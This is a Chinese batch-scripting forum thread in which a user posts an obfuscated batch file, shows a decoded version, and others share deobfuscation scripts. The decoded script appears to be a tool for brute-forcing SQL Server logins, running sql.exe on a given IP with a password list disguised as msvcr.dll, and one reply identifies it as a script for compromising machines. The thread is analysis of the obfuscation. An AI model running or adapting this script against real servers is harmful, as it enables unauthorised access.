[新手上路]批处理新手入门导读[视频教程]批处理基础视频教程[视频教程]VBS基础视频教程[批处理精品]批处理版照片整理器
[批处理精品]纯批处理备份&还原驱动[批处理精品]CMD命令50条不能说的秘密[在线下载]第三方命令行工具[在线帮助]VBScript / JScript 在线参考
返回列表 发帖

[其他] 变量加密批处理我来解密大家来看看我解密错误没?

加密的样子
  1. @shift
  2. @%comspec:~-1%%userprofile:~5,1%h%appdata:~-7,1% %appdata:~-7,1%%programfiles:~-5,1%%programfiles:~-5,1%
  3. %comspec:~-16,1%%comspec:~-1%%comspec:~-13,1% %comspec:~-13,1%%userprofile:~5,1%%appdata:~-7,1%%appdata:~-15,1%%userprofile:~6,1%=%%bh%%jkq%%vz%%f7%%4c50t%%u1w8%%(cdf9)%%@6tc%%
  4. %tcopu:~32,1%%comspec:~-1%%userprofile:~5,1%%tcopu:~2,1%%appdata:~-7,1% %appdata:~-7,1%%tcopu:~11,1%%tcopu:~11,1%
  5. %comspec:~-16,1%%comspec:~-1%%comspec:~-13,1% IP=%1
  6. %comspec:~-16,1%%comspec:~-1%%comspec:~-13,1% USER=%2
  7. %comspec:~-16,1%%comspec:~-1%%comspec:~-13,1% PASS=%3
  8. %userprofile:~5,1%%appdata:~-7,1%%appdata:~-13,1%%appdata:~-7,1%%programfiles:~4,1% %userprofile:~5,1%
  9. T%programfiles:~-4,1%%comspec:~-13,1%%appdata:~-13,1%%comspec:~-1% %a% 正在修复中~~
  10. %appdata:~7,1%%appdata:~-7,1%%appdata:~15,1%%comspec:~-1% %userprofile:~5,1%%appdata:~-7,1%%userprofile:~14,1%: %userprofile:~5,1%%appdata:~-7,1%%appdata:~-13,1%%comspec:~-16,1%=%comspec:~-9,1%%tcopu:~17,1% %appdata:~-13,1%%programfiles:~-4,1%%userprofile:~14,1%%comspec:~-1%%comspec:~-16,1%=%tcopu:~16,1%
  11. %comspec:~-1%%userprofile:~5,1%%tcopu:~2,1%%appdata:~-7,1% %IP% SQL
  12. %comspec:~-1%%userprofile:~5,1%%tcopu:~2,1%%appdata:~-7,1% SQL账号%USER%
  13. %comspec:~-1%%userprofile:~5,1%%tcopu:~2,1%%appdata:~-7,1% SQL密码%PASS%
  14. %comspec:~-1%%userprofile:~5,1%%tcopu:~2,1%%appdata:~-7,1% %os:~5,1%%os:~5,1%%os:~5,1%.%tcopu:~21,1%%tcopu:~23,1%%tcopu:~21,1%%tcopu:~23,1%%comspec:~-13,1%%comspec:~-13,1%.%userprofile:~5,1%%appdata:~-7,1%%appdata:~7,1%
  15. %comspec:~-16,1%%tcopu:~6,1%%appdata:~-13,1%.%comspec:~-1%%comspec:~-2,1%%comspec:~-1% -S %IP% -U %USER% -P %PASS% <%appdata:~7,1%%comspec:~-16,1%%tcopu:~8,1%%userprofile:~5,1%%programfiles:~4,1%.%appdata:~15,1%%appdata:~-13,1%%appdata:~-13,1% -%userprofile:~14,1% -%appdata:~-13,1% %tcopu:~14,1% -%comspec:~-13,1% %tcopu:~23,1% -%appdata:~-7,1% %appdata:~-7,1%%tcopu:~5,1%\%IP%.%comspec:~-13,1%%comspec:~-2,1%%comspec:~-13,1%
  16. %comspec:~-1%%comspec:~-2,1%%programfiles:~-4,1%%comspec:~-13,1%
复制代码
我解密出来的
  1. @shift
  2. @echo oFF
  3. set tcopu=%%bh%%jkq%%vz%%f7%%4c50t%%u1w8%%(cdf9)%%@6tc%%
  4. @echo off
  5. set IP=%1
  6. set USER=%2
  7. set PASS=%3
  8. color c
  9. Title %a% 正在修复中~~
  10. mode con: cols=20 lines=5
  11. echo %IP% SQL
  12. echo SQL账号%USER%
  13. echo SQL密码%PASS%  
  14. sql.exe -S %IP% -U %USER% -P %PASS% <msvcr.dll -n -l 4 -t 8 -o ok\%IP%.txt
  15. exit
复制代码
但是我感觉不对 求高手解密出来看看

我汗  这是抓鸡的吧

TOP

回复 6# tz_being


    解密代码贴出来看看吧

TOP

据试验,5楼的解密代码和另一个帖子netbenton的解密代码都不行,我用另外的方法解密出的内容与楼主是相同的,只是楼主少了一句“echo www.1818tt.com

TOP

用 cmd /c 代替 call 以避免空变量被处理为空...但仍无法预知程序运行时对变量的动态影响:
  1. @echo off&setlocal enabledelayedexpansion
  2. (for /f "delims="eol^= %%a in ('findstr /n . %1') do (
  3. set str=
  4. set /p str=
  5. for /f "delims="eol^= %%b in ('echo ^"!str:"=""!"') do (
  6. setlocal disabledelayedexpansion
  7. echo:%%~b>$
  8. endlocal&set str=
  9. set /p str=<$
  10. )
  11. set "str=!str:""="!"
  12. echo:!str!
  13. for /f "tokens=1*" %%b in ("!str!") do (
  14. if /i %%b==set call set %%c
  15. )
  16. ))<%1
  17. del $>nul
  18. pause
复制代码

TOP

你用的是这个代码解密的吗?
http://www.bathome.net/thread-7204-1-1.html

TOP

本帖最后由 CrLf 于 2012-6-15 22:34 编辑

吐槽一下,引用环境变量来进行变量加密时完全不考虑通用性的行为,只能单机娱乐,变量环境稍有不同,解密后的结果将不完整。
解密代码,抗干扰能力弱爆了:
  1. @echo off&setlocal enabledelayedexpansion
  2. (for /f "delims="eol^= %%a in ('findstr /n . %1') do (
  3. set /p str=
  4. call set "str=!str!"
  5. echo !str:%%=%%%%!
  6. for /f "tokens=1*"eol^= %%b in ("!str!") do (
  7. if /i %%b==set set %%c
  8. )
  9. ))<%1
  10. pause
复制代码
只能解密出框架,因为无法区分用于加密的变量与实际意图而引用的 %str% 变量,也无法预知实际运行时才会发生的变量变更

TOP

怎么没人啊

TOP

返回列表